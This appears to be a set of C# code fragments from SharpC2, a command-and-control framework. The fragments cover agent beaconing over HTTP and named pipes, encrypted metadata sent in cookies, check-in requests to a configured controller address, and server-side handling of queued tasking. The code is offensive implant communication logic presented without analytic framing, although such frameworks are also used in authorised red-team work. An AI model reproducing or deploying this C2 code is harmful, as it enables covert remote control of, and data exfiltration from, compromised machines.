private void StartClient()
{
Task.Factory.StartNew(delegate()
{
while (ModuleStatus == ModuleStatus.Running)
{
Status.Reset();
var pipe = new NamedPipeClientStream(ConnectHost, Pipename, PipeDirection.InOut, PipeOptions.Asynchronous);
pipe.Connect(5000);
var outbound = new AgentMessage {
Metadata = Metadata
};
if (Outbound.Count > 0)
{
outbound = Outbound.Dequeue();
}
var dataToSend = Crypto.Encrypt(outbound);
pipe.BeginWrite(dataToSend, 0, dataToSend.Length, new AsyncCallback(ClientWriteCallback), pipe);
Status.WaitOne();
Thread.Sleep(1000);
}
});
}
private void SendData(Socket handler, List <AgentMessage> messages)
{
var encrypted = CryptoController.Encrypt(messages);
var response = new StringBuilder("HTTP/1.1 200 OK\r\n");
response.Append(string.Format("X-Malware: SharpC2\r\n"));
response.Append(string.Format("Content-Length: {0}\r\n", encrypted.Length));
response.Append(string.Format("Date: {0}\r\n", DateTime.UtcNow.ToString("ddd, d MMM yyyy HH:mm:ss UTC")));
response.Append("\r\n");
var headers = Encoding.UTF8.GetBytes(response.ToString());
var dataToSend = new byte[encrypted.Length + headers.Length];
Buffer.BlockCopy(headers, 0, dataToSend, 0, headers.Length);
Buffer.BlockCopy(encrypted, 0, dataToSend, headers.Length, encrypted.Length);
try
{
handler.BeginSend(dataToSend, 0, dataToSend.Length, 0, new AsyncCallback(SendCallback), handler);
}
catch
{
// socket may be forcibly closed if agent dies
}
}
public virtual WebClient GetWebClient()
{
var client = new WebClient();
var metadata = Crypto.Encrypt(Metadata);
client.Headers.Clear();
client.Headers.Add("X-Malware", "SharpC2");
client.Headers[HttpRequestHeader.Cookie] = $"Metadata={Convert.ToBase64String(metadata)}";
return(client);
}
private void CheckIn()
{
var metadata = Crypto.Encrypt(Metadata);
var client = GetWebClient();
client.Headers[HttpRequestHeader.Cookie] = string.Format("{0}={1}", "Metadata", Convert.ToBase64String(metadata));
AgentMessage message;
Uri uri;
byte[] outMessage;
string dataToSend;
if (Outbound.Count > 0)
{
message = Outbound.Dequeue();
outMessage = Crypto.Encrypt(message);
dataToSend = $"Message={Convert.ToBase64String(outMessage)}";
uri = new Uri($"http://{ConnectAddress}:{ConnectPort}");
client.UploadDataAsync(uri, Encoding.UTF8.GetBytes(dataToSend));
}
else
{
message = new AgentMessage
{
Metadata = Metadata,
Data = new C2Data
{
AgentID = Metadata.AgentID,
Module = "Core",
Command = "AgentCheckIn"
}
};
outMessage = Crypto.Encrypt(message);
dataToSend = $"Message={Convert.ToBase64String(outMessage)}";
uri = new Uri($"http://{ConnectAddress}:{ConnectPort}?{dataToSend}");
client.DownloadDataAsync(uri);
}
client.Dispose();
}
private void ServerReadCallback(IAsyncResult ar)
{
var state = ar.AsyncState as CommStateObject;
var stream = state.Worker as NetworkStream;
var bytesRead = 0;
try
{
bytesRead = stream.EndRead(ar);
}
catch { }
if (bytesRead > 0)
{
var data = DataJuggle(bytesRead, stream, state);
if (Crypto.VerifyHMAC(data))
{
var inbound = Crypto.Decrypt <AgentMessage>(data);
if (inbound != null)
{
Inbound.Enqueue(inbound);
}
}
AgentMessage outbound = new AgentMessage {
Metadata = Metadata
};
if (Outbound.Count > 0)
{
outbound = Outbound.Dequeue();
}
var encrypted = Crypto.Encrypt(outbound);
stream.BeginWrite(encrypted, 0, encrypted.Length, new AsyncCallback(ServerWriteCallback), stream);
}
}
